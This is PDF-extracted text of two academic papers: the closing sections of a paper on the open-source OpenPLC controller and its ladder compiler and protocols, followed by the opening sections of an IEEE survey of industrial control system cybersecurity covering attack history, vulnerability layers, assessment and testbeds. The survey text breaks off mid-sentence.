back to a conductive state, enabling the circuit to work properly. Optocouplers and relays were used to isolate high power circuits from control logic. The filled zones were connected to ground and only the low power zones of the board were filled. To isolate the communication and 24V grounds from the filled zone, zero ohm resistors were used. To protect against reverse polarity on inputs, diodes were connected in series to allow current flow in only one direction. Also, capacitors were used in parallel to ground to filter noise from sensitive devices. IV. T HE OPENPLC SOFTWARE ARCHITECTURE What differentiates a PLC fro m any other robust digital controller is its ability to be programmed in some standardized languages. Accord ing to [3], the IEC 61131-3 standard defines five languages on which PLCs can be programmed: - FBD [Function Block Diagram] - Ladder Diagram - Structured Text - Instruction List - SFC [Sequential Function Chart] The most widely used language in PLC is the Ladder Diagram. PLCs from different manufacturers might not have all the five programming languages available, but they certainly have the Ladder Diag ram as one of the options. For this reason, it was important to develop a software t h a t w a s a b l e t o c o m p i l e a l a d d e r d i a g r a m i n t o a c o d e t h a t could be understood by the CPU of the OpenPLC. The solution was partially based on LDmicro [6], an open source ladder editor, simulator and compiler for 8-bit microcontrollers. It generates native code for Atmel AVR and Microchip PIC16 CPUs from a ladder diagram. Unfortunately, the OpenPLC CPU uses the ATmega2560, which is not supported by the original LDmicro software. Also, the generated code contains only the ladder logic converted to assembly instructions. The OpenPLC has many other functions to perform, such as communication over Ethernet for MODBUS-TCP supervisory systems, RS-485 and USB, individual modules control, error messages generation and so on. For this reason, it was necessary to create an intermediate step before the final compilation in which the ladder diagram had to be combined with the OpenPLC firmware. Doing so, the final program would contain both the ladder logic and the OpenPLC functions. One of the outputs generated by the LDmicro for the Ladder Diagram was ANSI C code. So, instead of having machine code f or a specific processor, an ANSI C code that could be compiled for any platform was generated. The only thing that had to be provided using this method was a C header to link the generated ANSI C functions and the target system. The OpenPLC Ladder Editor (Fig. 6) was created to fulfill these tasks. Basically, the OpenPLC Ladder Editor is a modified version of the LDmicro, with reduced instructions (processor-specific instructions had to be removed), no support to direct compiling (it only generates ANSI C code) and a tool that can automatically link the generated ANSI C code with the OpenPLC firmware, compile everything using AVR GCC and upload the compiled software to the OpenPLC. The compiler tool is called every time the compile button is clicked. While the code for the LDmicro was created using C++, the compilation tool was created using C# .net, a very robust and modern language. The final result is a binary program uploaded to the OpenPLC CPU, containing both the ladder logic and the functions of the OpenPLC firmware. Fig. 6. OpenPLC Ladder Editor software running on a PC A. MODBUS Communication MODBUS is an industry standard protocol for automation devices. Although, the message format is maintained, there are some variations of this protocol depending on the physical interface it will be used on. A s the OpenPLC has Ethernet over TCP-IP, it was implemented support for the MODBUS-TCP protocol. Only the most used functions of the protocol were implemented, as shown next: Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. - FC01 - Read Coil Status - FC02 - Read Input Status - FC03 - Read Holding Registers - FC05 - Force Single Coil - FC15 - Force Multiple Coils B. Boards Communication To become a modular system, each module of the O p e n P L C m u s t h a v e a w a y t o c o m m u n i c a t e w i t h t h e C P U . The RS-485 bus is the physical protocol through which messages are sent. But it was necessary to create a protocol on the application layer, to standardize the messages sent and received. The protocol created was called OPLC Protocol. It is a simple protocol that encapsu lates each message sent or received with information about destination, size of the message and function to be executed. TABLE I. OPLC PROTOCOL HEADER Start Size Function Address Data 1 Byte 1 Byte 1 Byte 1 Byte n Bytes Every message starts with a s t a r t b y t e , w h i c h i s a l w a y s 0x7E. The receiver will only process the message after receiving the start byte. The si ze field must contain the size (in bytes) of the Data field only. The function field is relate d to the data field. It means that what the receiver will do with the data received depends on the function. Five functions were implemented for the OPLC Protocol: - 0x01 Ask for the card type - 0x02 Change card logical address - 0x03 Read discrete inputs - 0x04 Set discrete outputs - 0x05 error message The address field may have the logic or the physical address of the card, according to the function requested. For example, the functions 0x01 and 0x02 are addressed to the physical address, because they are related to low level commands, such as get card information or change the logical address. V. R ESULTS To evaluate the OpenPLC as a real PLC, a benchmark had to be made comparing it with another controller. This was achieved using a model of a five floor building with an elevator originally controlled by a Siemens S7-200 PLC. Modifications were made to the model enabling it to interchange PLCs easily for the tests. The elevator is moved b y a D C m o t o r a t t a c h e d t o i t . T h e r e a r e l i m i t s w i t c h e s o n every floor to indicate elevator's position. Also, limit switch es were installed at the top and bottom of the building to prevent the elevator to move over the permitted range. Lights indicators on every floor were used to visually indicate when the elevator stops at the respective floor. Five push buttons were used to call the elevator to the desired floor. The ladder diagram for this task was already written for the Siemens PLC using the Siemens Step 7 platform. It used 13 digital inputs and 10 digital outputs to fully control the model. The diagram was printed and the exactly same diagram was written for the OpenPLC using the same logic blocks, see Figure 10. The OpenPLC Ladder Editor was used to compile, simulate and upload the diagram to the OpenPLC. During tests, a bug on the ladder diagram was found. If the user held the push button related to the floor on which the elevator was located while pushing another button to send it to another floor, the system hung with an infinite loop. As expected, the OpenPLC behaved exactly the same way as the Siemens PLC, presenting the same bug. After correcting the ladder on both controllers, each one operated flawlessly. The response of diverse stimulus on each PLC was identical on every tested situation. VI. C ONCLUSION The open source community is growing stronger every day. There are many projects, from software to hardware with contributions from people all around the world. Creating an open source industrial controller from scratch is a very bold task. But thanks to the support of the open source community like the Arduino and LDmicro it was possible to create a prototype of a functional PLC comparable with a standardized industry controller. During tests, the OpenPLC behaved exactly the same way as other controllers, given the same input impulses. The MODBUS-TCP communication was tested using SCADA software from different vendors. It was possible to read inputs and outputs and force outputs as it would be on any other PLC. Our next big step is to use our OpenPLC in a field application, evaluating its robustness, versatility and ease of use for the user. R EFERENCES [1] P.E. Moody and R.E. Morley, How Manufacturing Will Work in the Year 2020 , Simon and Schuster. [2] R. Oshana and M. Kraeling, Software Engineering for Embedded Systems: Methods, Practical Techniques, and Applications , 1st ed. Newnes, 2013 pp.12-20. [3] K.H. John and M. Tiegelkamp, IEC 61131-3: Programming Industrial Automation Systems, 2nd ed. Springer, 2010 pp.147-168. [4] Atmel Corporation, ATmega2560, Atmel.com. 2014. 8 Jul. 2014. http://www.atmel.com/devices/atmega2560.aspx. [5] Arduino, Arduino MEGA ADK, arduino.cc. 2014. 8 Jul. 2014. http://arduino.cc/en/Main/ArduinoBoardMegaADK. [6] J . W e s t h u e s , L a d d e r L o g i c f o r P I C a n d A V R , c q . c x . 2014. 8 Jul. 2014. http://cq.cx/ladder.pl. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply.
The_Cybersecurity_Landscape_in_Industrial_Control_Systems.pdf
|Industrial control systems (ICSs) are transition- ing from legacy-electromechanical-based systems to modern information and communication technology (ICT)-based sys-tems creating a close coupling between cyber and physicalcomponents. In this paper, we explore the ICS cybersecuritylandscape including: 1) the key principles and unique aspectsof ICS operation; 2) a brief history of cyberattacks on ICS;3) an overview of ICS security assessment; 4) a survey of uniquely-ICS testbeds that capture the interactions between the various layers of an ICS; and 5) current trends in ICS at- tacks and defenses.
CONTRIBUTED PAPER The Cybersecurity Landscape in Industrial Control Systems This paper surveys the state of the art in industrial control system (ICS) security, identifies outstanding research challenges in this emerging area, and explains the key concepts and principles for deployment of cybersecurity methods and tools to ICSs. ByStephen McLaughlin, Charalambos Ko nstantinou, Xueyang Wang, Lucas Davi, Ahmad-Reza Sadeghi, Michail Maniatakos, and Ramesh Karri KEYWORDS |Computer security; industrial control; networked control systems; power system security; SCADA systems; security I.INTRODUCTION Modern industrial control systems (ICSs) use informa- tion and communication technologies (ICTs) to controland automate stable operation of industrial processes [1], [2]. ICSs interconnect, monitor, and control pro- cesses in a variety of industries such as electric powergeneration, transmission and distribution, chemical pro-duction, oil and gas, refining and water desalination. Thesecurity of ICSs is receiving attention due to its increas-ing connections to the Internet [3]. ICS security vulnera-bilities can be attributed to several factors: use ofmicroprocessor-based controllers, adoption of communi- cation standards and protocols, and the complex distrib- uted network architectures. The security of ICSs hascome under particular scrutiny owing to attacks on criti-cal infrastructures [4], [5]. Traditional IT security solutions fail to address the coupling between the cyber and physical components ofan ICS [6]. According to NIST [1], ICSs differ from tradi-tional IT systems in the following ways. 1) The primary goal of ICSs is to maintain the integrity of the industrial process. 2) ICS processes are continuous and hence needto be highly available; unexpected outages for repair mustbe planned and scheduled. 3) In an ICS, interactions withphysical processes are central and often times complex.4) ICSs target specific industrial processes and may nothave resources for additional capabilities such as security.5) In ICSs, timely response to human reaction and physi- cal sensors is critical. 6) ICSs use proprietary communica- tion protocols to control field devices. 7) ICS componentsare replaced infrequently (15 20 years or longer). 8) ICScomponents are distributed and isolated and hence diffi-cult to physically access to repair and upgrade. A t t a c k so nI C S sa r eh a p p e n i n ga ta na l a r m i n gp a c e and the cost of these attacks is substantial for both gov-ernments and industries [7]. Cyberattacks against oil and gas infrastructure are estimated to cost the companies $1.87 billion by 2018 [8]. Until 2001, most of attacksoriginated internal to a company. Recently, attacks Manuscript received August 31, 2015; revised November 19, 2015; accepted December 19, 2015. Date of publication March 16, 2016; date of current versionApril 19, 2016. This work was supported in part by German Science Foundation as part of Project S2 within the CRC 1119 CROSSING; by the European Union s Seventh Framework Programme under Grant 609611, PRACTICE project; and by the Intel Collaborative Research Institute for Secure Computing (ICRI-SC). The NYU researchers were also supported in part by Consolidated Edison, Inc., under Award 4265141; by the U.S. Office of Naval Research under Award N00014-15-1-2182; and by the NYU Center for Cyber Security (New York and Abu Dhabi).S. McLaughlin is with KNOX Security, Samsung Research America, Mountain View, CA 94043 USA (e-mail: [email protected]). C. Konstantinou ,X. Wang , and R. Karri are with the Polytechnic School of Engineering, New York University, Brooklyn, NY 11201 USA (e-mail: [email protected]; [email protected]).L. Davi andA.-R. Sadeghi are with Technische Universit t Darmstadt, Darmstadt 64289, Germany (e-mail: [email protected]; ahmad.sadeghi@ trust.cased.de). M. Maniatakos is with the Electrical and Computer Engineering Department, New York University Abu Dhabi, Abu Dhabi, UAE (e-mail: michail.maniatakos@ nyu.edu). Digital Object Identifier: 10.1109/JPROC.2015.2512235 0018-9219 2016 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1039Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. external to a company are becoming frequent. This is due to the use of commercial off-the-shelf (COTS) de-vices, open applications and operating systems, and in-creasing connection of the ICS to the Internet. In an effort to keep up with the cyberattacks, cyber- security researchers are inve stigating the attack surface and defenses for critical infrastructure domains such asthe smart grid [9], oil and gas [10], and water SCADA[11]. This survey will focus on the general ICS cybersecu-rity landscape by discussing attacks and defenses at vari-ous levels of abstraction in an ICS from the hardware tothe process. A. Industrial Control Systems The general architecture of an ICS is shown in Fig. 1. The main components of an ICS include the following. Programmable logic controller (PLC): A PLC is a digital computer used to automate industrial elec-tromechanical processes. PLCs control the stateof output devices based on the signals received from the sensors and the stored programs. PLCs operate in harsh environmental conditions, suchas excessive vibration and high noise [12]. PLCscontrol standalone equipment and discretemanufacturing processes. Distributed control system (DCS): DCS is an au- tomated control system in which the controlelements are distributed throughout the system [13]. The distributed controllers are networked to remotely monitor processes. The DCS can remainoperational even if a part of the control systemfails. DCSs are often found in continuous andbatch production processes which require ad-vanced control and communication with intelli-gent field devices. Supervisory control and data acquisition (SCA- DA): SCADA is a computer system used to moni- tor and control industrial processes. SCADAmonitors and controls field sites spread out overa geographically large area. SCADA systemsgather data in real time from remote locations.Supervisory decisions are then made to adjustcontrols. B. History of ICS Attacks In an ICS, the stable operation could be disrupted not only by an operator error or a failure at a productionunit, but also by a software error/bug, malware, or an in-tentional cyber criminal attack [14]. Just in 2014, theICS Cyber Emergency Response Team (ICS-CERT) re-sponded to 245 incidents. Numerous cyberattacks on ICS are summarized in Fig. 2. We elaborate on four ICS at- tacks that caused physical damages. In 2007, Idaho National Laboratory staged the Aurora attack, in order to demonstrate how a cyberattack coulddestroy physical components of the electric grid [15].The attacker gained the access to the control network ofa diesel generator. Then a malicious computer programwas run to rapidly open and close the circuit breakers of the generator, out of phase from the rest of the grid, re- sulting in an explosion of the diesel generator. Sincemost of the grid equipment us es legacy communications protocols that did not consider security, this vulnerabilityis especially a concern [16]. In 2008, a pipeline in Turkey was hit by a powerful explosion spilling over 30000 barrels of oil in an areaabove a water aquifer. Further, it cost British Petroleum $5 million a day in transit tariffs. The attackers entered the system by exploiting the vulnerabilities of the wire-less camera communication software, and then moveddeep into the internal network. The attackers tamperedwith the units used to alert the control room about mal-functions and leaks, and compromised PLCs at valve sta-tions to increase pressure in the pipeline causing theexplosion. In 2010, Stuxnet computer worm infected PLCs in 14 industrial sites in Iran, including an uranium enrich-ment plant [4], [17]. It was introduced to the target sys-tem via an infected USB flash drive. Stuxnet thenstealthily propagated through the network by infectingremovable drives, copying itself in the network sharedresources, and by exploiting unpatched vulnerabilities. Fig. 1. General structure of an ICS. The industrial process data collected at remote sites are sent by field devices such as remote terminal units (RTUs), intelligent electronic devices(IEDs), and programmable logic controller (PLCs), to the controlcenter through wired and wireless links. The control server allows clients to access data using standard protocols. The human machine interface (HMI) presents processed data to a human operator, by querying the time-stamped dataaccumulated in the data historian. The gathered data are analyzed, and control commands are sent to remote controllers. 1040 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. The infected computers were instructed to connect to an external command and control server. The central serverthen reprogrammed the PLCs to modify the operation ofthe centrifuges to tear themselves apart by the compro-mised PLCs [18]. In 2015, two hackers demonstrated a remote control of a vehicle [19]. The zero-day exploit gave the hackers wireless control of the vehicles. The software vulnerabil-ities in the vehicle entertainment system allowed thehackers to remotely control it, including dashboard func-tions, steering, brakes, and t ransmission, enabling mali- cious actions such as controlling the air conditioner andaudio, disabling the engine and the brakes, and comman- deering the wheel [20]. This is a harbinger of attacks in an automated manufacturing environment where intelli- gent robots cohabitate and coordinate with humans. C. Roadmap of This Paper Cybersecurity assessment can reveal the obvious and nonobvious physical implications of ICS vulnerabilitieson the target industrial processes. Cybersecurity assess-ment of ICSs for physical processes requires capturing the different layers of an ICS architecture. The chal- lenges of creating a vulnerability assessment methodol-ogy are discussed in Section II. Cybersecurity assessmentof an ICS requires the use of a testbed. The ICS testbedshould help identify cybersecurity vulnerabilities as wellas the ability of the ICS to withstand various types ofattacks that exploit these vulnerabilities. In addition,the testbed should ensure that critical areas of the ICS are given adequate attention. This way one can lessen the costs for fixing cybersecurity vulnerabilities emerg-ing from flaws in the design of ICS components and theICS network. ICS testbeds are discussed in Section II.Discussion on how one can construct attack vectors ap-pears in Section III. Attacks on ICSs have devastatingphysical consequences. Therefore, ICSs need to bedesigned for security robustness and tested prior to deployment. Control protocols should be fitted withsecurity features and policies. ICSs should be reinforcedby isolating critical operations by removing unnecessaryservices and applications from ICS components. Exten-sive discussion on vulnerability mitigation appears in Section IV, followed by final remarks in Section V. II.ICS VULNERABILITY ASSESSMENT In this section, we review the different layers in an ICS, the vulnerability assessment process outlining the cyber-security assessment strategy and discuss ICS testbeds foraccurate vulnerability analyses in a lab environment. A. The ICS Architecture and Vulnerabilities The different layers of ICS architecture are shown in Fig. 3. 1) Hardware Layer: Embedded components such as PLCs and RTUs are hardware modules executing software.Hardware attacks such as fault injection and backdoors can be introduced into these modules. These vulnerabil- ities in the hardware can be exploited by adversaries togain access to stored information or to deny services. The hardware-level vulnerabilities concern the entire lifecycle of an ICS from design to disposal. Security inthe processor supply chain is a major issue since hard-ware trojans can be injected in any stage of the supplychain introducing potential risks such as loss of reliabil- ity and security [21], [22]. Unauthorized users can use JTAG ports used for in-circuit test to steal intellec-tual property, modify firmware, and reverse engineerlogic [23] [25]. Peripherals introduce vulnerabilities.For example, malicious USB drives can redirect commu-nications by changing DNS settings or destroy the cir-cuit board [26], [27]. Expansion cards, memory units,Fig. 2. Timeline of cyberattacks on ICS and their physical impacts. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1041McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. and communication ports pose a security threat as well [28] [30]. 2) Firmware Layer: The firmware resides between the hardware and software. It includes data and instructionsable to control the hardware. The functionality of firm-ware ranges from booting the hardware providing run-time services to loading an operating system (OS). Due tothe real-time constraints related to the operation of ICSs, firmware-driven systems typically adopt a real-time oper-ating system (RTOS) such as VxWorks. In any case, vul- nerabilities within the fir mware could be exploited by adversaries to abnormally affect the ICS process. A recentstudy exploited vulnerabilities in a wireless access pointand a recloser controller firmware [31]. Malicious firm-ware can be distributed from a central system in an Fig. 3. Layered ICS architecture and the vulnerable components in the ICS stack. 1042 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. advanced metering infrastructure (AMI) to smart meters [32]. Clearly, that vulnerabilities in firmware can be used to launch DoS attacks to disrupt the ICS operation. 3) Software Layer: ICSs employ a variety of software platforms and applications, and vulnerabilities in thesoftware base may range from simple coding errors topoor implementation of access control mechanisms. Ac-cording to ICS-CERT, the highest percentage of vulnera- b i l i t i e si nI C Sp r o d u c t si si m p r o p e ri n p u tv a l i d a t i o nb y ICS software, also known as the buffer overflow vulnera-bility [33]. Poor management of credentials and authen-tication weaknesses are second and third, respectively.These vulnerabilities in the implementation of softwareinterfaces (e.g., HMI) and server configurations mayhave fatal consequences on the control functionality ofan ICS. For instance, a proprietary industrial automation software for historian servers had a heap buffer overflow vulnerability that could potentially lead to a Stuxnet-typeattack [34]. Sophisticated malware often incorporate both hard- ware and software. WebGL vulnerabilities are an exampleof hardware-enabled software attacks: access to graphicsGPU hardware by a least-privileged remote party resultsi nt h ee x p o s u r eo fG P Um e m o r yc o n t e n t sf r o mp r e v i o u s workloads [35]. The implementation of the software layer in a HIL testbed should reflect how each added compo-nent to the ICS increases the attack surface. 4) Network Layer: Vulnerabilities can be introduced into the ICS network in diffe rent ways [1]: a) firewalls (that protect devices on a network by monitoring andcontrolling communication packets using filtering poli- cies); b) modems (that convert between serial digital data and a signal suitable for transmission over a tele-phone line to allow devices to communicate); c) fieldbusnetwork (that links sensors and other devices to a PLC or other controller); d) communications systems androuters (that transfer messages between two networks);e) remote access points (that remotely configure ICS andaccess process data); and f) protocols and control net- work (that connect the supervisory control level to lower level control modules). DCS and SCADA servers, com-municating with lower level control devices, often arenot configured properly and not patched systematicallyand hence are vulnerable to emerging threats [36]. When designing a network architecture for an ICS, one should separate the ICS network from the corporatenetwork. In case the networks must be connected, only minimal connections should be allowed and the connec- tion must be through a firewall and a DMZ. 5) Process Layer: All the aforementioned ICS layers in- teract to implement the target ICS processes. The ob-served dynamic behavior of the ICS processes mustfollow the dynamic process characteristics based on thedesigned ICS model [37]. ICS process-centric attacks may inject spurious/incorrect information (through spe-cially crafted messages) to degrade performance or tohamper the efficiency of the controlled process [33].Process-centric attacks may also disturb the process state(e.g., crash or halt) by modifying runtime process vari-ables or the control logic. These attacks can deny serviceor change the industrial process without operator knowl- edge. Therefore, it is imperative to determine if varia- tions in the system process are nominal consequences ofan expected operation or signal an anomaly/attack.Process-centric/process-aw are vulnerability analysis can contribute to practices that enable ICS processes to func-tion in a secure manner. The vulnerabilities related tothe information flow (e.g., dependencies on hardware/software/network equipment with a single point of failure) must be determined. The HIL testbed should properly emulate the target process, in order to effec-tively assess and mitigate process-centric attacks [38]. B. ICS Vulnerability Assessment Fig. 4 presents the steps in the security assessment p r o c e s sw h o s ea i mi st oi d e n t i f ys e c u r i t yw e a k n e s s e sa n dpotential risks in ICSs. Due to the real-world conse-quences of ICS, security assessment of ICSs must ac-count for all possible operating conditions of each ICS component. Additionally, since ICS equipment can be more fragile than standard IT systems, the security as-sessment should take into consi deration the sensitive ICS dependencies and connectivity [39]. 1) Document Analysis: The first step in assessing any ICS is to characterize the different parts of its architec-ture. This includes gathering and analyzing information in order to understand the behavior of each ICS com- ponent. For example, analyzing the features of IEDsused in power systems such as a relay controller en-tails collecting information about its communication,Fig. 4. Security assessment of ICS. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1043McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. functionality, default configuration passwords, and sup- ported protocols [40]. 2) Mission and Asset Prioritization: Prioritizing the mis- sions and assets of the ICS is the next step in security as-sessment. Resources must be allocated based on thepurpose and sensitivity of each function. Demilitarizedzones (DMZs), for instance, can be used to add a layerof security to the ICS network by isolating the ICS andcorporate networks [41]. Selecting DMZs is an importanttask in this phase. 3) Vulnerability Extrapolation: Next the ICS should be examined for security vulnerabilities, to identify sourcesof vulnerability, and to establish attack vectors [42]. De-sign weaknesses and security vulnerabilities in criticalauthentication, application and communication securitycomponents should be investigated. The attack vectorsshould comprehensively explain the targeted components and the attack technique. 4) Assessment Environment: Depending on the type of industry and level of abstraction, assessment actionsmust be defined [37]. For example, in case when onlysoftware is used, the test vectors should address as manyphysical and cyber characteristics of the ICS as possible.By modeling and simulating individual ICS modules, the behavior of the system is emulated with regards to how the ICS and its internal functions react. Due to the complexity and real-time requirements of ICSs, hardware-in-the-loop (HIL) simulation is more effi-cient to test system resiliency against the developed at-tack vectors [43]. HIL simulation adds the ICScomplexity to the assessment platform by adding thecontrol system in a loop, as shown in Fig. 5(b). To capture the system dynamics, the physical process is replaced with a simulated plant, including sensors,actuators, and machinery. A well-designed HIL simula- tor will mimic the actual process behavior as closely as possible. A detailed discussion of developing an as-sessment environment appears in Section II-C. 5) Testing and Impact: The ICS will be tested on the testbed to demonstrate the outcomes of the attacks in-cluding the potential effect on the physical componentsof the ICS [44]. In addition, the system-level response and the consequences to the overall network can be ob- served. The results can be used to assess the impact of acyberattack on the ICS. 6) Vulnerability Remediation: Any weaknesses discov- ered in the previous steps should be carefully mitigated.This may involve working with vendors [45] and updat-ing network policies [46]. If there is no practical mitiga- tion strategy to address a vulnerability, guidelines should be developed to allow sufficient time to effectively re-solve the issue. 7) Validation Testing: The mitigation actions designed to resolve security issues must then be tested. A criticalpart of this step is to reexa mine the ICS and identify weaknesses. 8) Monitoring: Implementing all the previous steps is half the battle. Continuous monitoring and reassessingthe ICS to maintain security is important [47]. Intrusiondetection systems (IDSs) can assist in continuously moni-toring network traffic and discover potential threats andvulnerabilities. C. ICS Testbeds The assessment environment, i.e., the testbed, effects all the stages of the assessment methodology. Assessmentmethodologies that include the production environmentor testing individual components of the ICS are not rele-vant. Although these methodologies are effective for ITsystems, uniquely-ICS nature of using data to manipu-late physics makes these ap proaches inherently hazard- ous. Therefore, we focus on lab-based ICS testbeds. A HIL testbed offers numerous benefits by balancing accu-racy and feasibility. In addition, HIL testbeds can beused to train employees and ensure interoperability ofthe diverse components used in the ICS. The cyber physical nature of ICSs presents several challenges in the design and operation of an ICS testbed.The testbed must be able to model the complex behavior of the ICS for both operation and nonoperation condi- tions. It should address scaling since the testbed is ascaled down model of the actual physical ICS. Further-more, the testbed must accurately represent the ICS inorder to support the protocols and standards as well asto generate accurate data. It is also important for thetestbed to capture the interaction between legacy and Fig. 5. (a) Real ICS environment versus (b) HIL simulation of ICSs. 1044 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. modern ICS. This interaction is important for both se- curity assessment and compatibility testing of the ICS. Numerous other factors should be considered when de-signing an ICS testbed including flexibility, interfacewith IT systems, configuration settings, and testing forextreme conditions. Assessment of ICS using software-only testbed and techniques is not frequently adopted. Software modelsand simulations cannot recreate real-world conditions since they include only one layer of the complex ICS ar- chitecture. Furthermore, the software models cannot in-clude every possible cyber physical system state of theICS [48]. Software-only testbeds are also limited by thesupported hardware. Finally, the limitations of the com-putational features supported by the software simulatormight introduce delays, simplify assumptions, and usesimple heuristics in the simul ator engine (e.g., theoreti- cal implementation of network protocols). Finally, in most cases, a software-only testbed gives the users afalse sense of security regarding the accuracy of thesimulation results. On the other hand, software-only as-sessment is advantageous in that one can study the be-havior of a system without building it. Scilab and Scicosare two open-source software platforms for design, sim-ulation, and realization of ICSs [49], [50]. It is clear that an ICS testbed requires real hardware in the simulation loop. Such HIL simulation symbioti-cally relates cyber and physical components [51]. A HILtestbed can simulate real-world interfaces including in-teroperable simulations of control infrastructures, dis-tributed computing applications, and communicationnetworks protocols. 1) Security Objectives of HIL Testbeds: The primary ob- jective of HIL testbeds is to guide implementation of cy-bersecurity within ICSs. In addition, HIL testbeds areessential to determine and resolve security vulnerabil-ities. The individual components of an appropriatetestbed should capture all the ICS layers, and the interac-tions are shown in Fig. 3. Equipment and network vulnerabilities can be tested in a protected environment that can facilitate multiple types of ICS scenarios highlighting the several layers of the ICSarchitecture. For instance, the cybersecurity testbed devel-oped by NIST covers several ICS application scenarios[52]. The Tennessee Eastman scenario covers the continu-ous process control in a chemical plant. The robotic assem-bly scenario covers the discrete dynamic processes withembedded control. The enclave scenario covers wide area industrial networks in an ICS such as SCADA. 2) Benefits of a HIL Assessment Methodology: The HIL assessment methodology has the following advantages: flexibility: HIL systems provide reconfigurable ar- chitectures for testing several ICS applicationscenarios (incorporating legacy and modern equipment); simulation: ICS phenomena are simulated faster than complex physical ICS events; accuracy: HIL simulators provide results compa- rable in terms of accuracy with the live ICSenvironment; repeatability: the controlled settings in the testbed increase repeatability; cost effectiveness: the combination of hardware HIL software reduces the implementation costsof the testbed; safety: HIL simulation avoids the hazards present when testing in a live ICS setting; comprehensiveness: it is often possible to assess ICS scenarios over a wider range of operatingconditions; modularity: HIL testbeds facilitate linkages with other interfaces and testbeds, integrating multi-ple types of control components; network integration: protocols and standards can be evaluated creating an accurate map of net-worked units and their connection communica-tion links; nondestructive test: destructive events can be evaluated (e.g., aurora generator test [53]) with- out causing damage to the real system; hardware security: HIL testbed allows one to study the hardware security of an ICS which hasbecome a major concern over the past decade 7(e.g., side-channel and firmware attacks [44]). 3) Example ICS Testbeds: Over 35 smart grid testbeds have been developed in the United States [54]. ENEL SPA testbed analyzes attack scenarios and their impacton power plants [55]. It includes a scaled down physicalprocess, corporate and control networks, DMZs, PLCs,industrial standard software, etc. The Idaho NationalLaboratories (INL) SCADA Testbed is a large-scaletestbed dedicated to ICS cybersecurity assessment, stan-dards improvements, and training [56]. The PowerCyber testbed integrates communication protocols, industry control software, and field devices combined with virtua-lization platforms, real-time digital simulators (RTDSs),and ISEAGE WAN emulation in order to provide an ac-curate representation of cyber physical grid interdepen-dencies [57]. Digital B ond s Project Basecamp demonstrates the fragility and insecurity of SCADA andDCS field devices, such as PLCs and RTUs [58]. New York University (NYU) has developed a smart grid testbed to model the operation of circuit breakers anddemonstrate firmware modification attacks on relay con-trollers [44]. Many hybrid laboratory-scale ICS testbedsexist in research centers and universities [54]. Besideslaboratory-scale ICS testbeds with real equipment, manyvirtual testbeds are also being developed able to create Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1045McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. ICS components including virtual devices and process simulators [59]. Summarizing, given that many ICS attacks exploit vulnerabilities in one or more layers of an ICS, HIL ICStestbeds are becoming standard for security assessment,allowing development and testing of advanced securitymethods. Additionally, HIL ICS testbeds have been quan-titatively shown to produce results close to real-worldsystems. III. ATTACKS ON ICSs An important part of the assessment process is the iden- tification of vulnerabilities in the ICS under test. In thissection, we present the current and emerging threatlandscapes for ICSs. A. Current ICS Threat Landscape ICSs are vulnerable to traditional computer viruses [60] [62], remote break-ins [63], insider attacks [64],and targeted attacks [65]. Industries affected by ICS at-tacks include nuclear power and refinement of fissile ma-terial [62], [65], transportation [63], [66], electric powerdelivery [67], manufacturin g [60], building automation [64], and space exploration [61]. One class of attacks against ICS involves compromis- ing one or more of its components using traditional at-tacks, e.g., memory exploits, to gain control of thesystems behavior, or access sensitive data related to theprocess. We consider three classes of studies on ICSvulnerabilities. The first considers studies of the secu-rity and security readiness of ICS systems and theiroperators. The second class considers security vulnera- bilities in PLCs. The third class considers vulnerabil- ities in sensors, in this case, focusing on smart electricmeters, an important component of the smart gridinfrastructure. 1) ICS Security Posture: There have been studies of the ICS security posture [68] and the conclusion is thatthere is substantial room for improvement. First, it was f o u n dt h a tI C S sf r e q u e n t l yr e l yo ns e c u r i t yt h r o u g ho b - scurity, due to their history of being proprietary systemsisolated from the Internet. However, use of commodityOS (e.g., Microsoft Windows OS) and open, standardnetwork protocols, have left ICS open not only to mali-cious attacks, but also to coincidental infiltration by In-ternet malware. For example, the slammer worminfected machines belonging to an Ohio nuclear power generation facility. These studies also showed a signifi- cant rise in ICS cybersecuri ty incidents; while only one incident was reported in 2000, ten incidents were re-ported in 2003. Penetration tests of over 100 real-worldICSs over the course of ten years, with emphasis onpower control systems, corroborate these findings [69].Besides identifying vulnerab ilities throughout the ICS,the study shows that in most cases, these ICSs are at least a year behind the standard patch cycle. In some cases, the DMZ separating the ICS from the corporatenetwork had not been updated in years leaving DoS at-tacks trivial. For example, in their evaluation of a net-work connected PLC, it was found that ping floodingwith 6-kB packets was sufficient to render the PLC inop-erable, causing all state to be lost and forcing it to bepower cycled. Another hurdle in improving ICS security are three commonly held myths [70]: 